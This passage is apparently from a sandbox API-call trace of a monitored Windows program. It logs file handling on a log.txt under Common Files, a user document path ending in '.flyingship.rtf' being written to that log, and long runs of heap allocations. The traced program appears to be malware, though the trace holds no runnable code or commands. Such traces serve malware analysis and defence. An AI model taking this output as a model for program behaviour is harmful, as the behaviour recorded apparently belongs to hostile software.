(lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.800] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.800] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.800] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.800] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.801] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.801] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1752, lpOverlapped=0x0) returned 1 [0177.801] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.802] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1752, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.802] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0177.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0177.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\n", cchWideChar=80, lpMultiByteStr=0x923b28, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\n", lpUsedDefaultChar=0x0) returned 80 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0177.802] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.802] CloseHandle (hObject=0x138) returned 1 [0177.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.805] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.805] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.807] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.807] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.807] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.807] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0177.807] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.811] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: 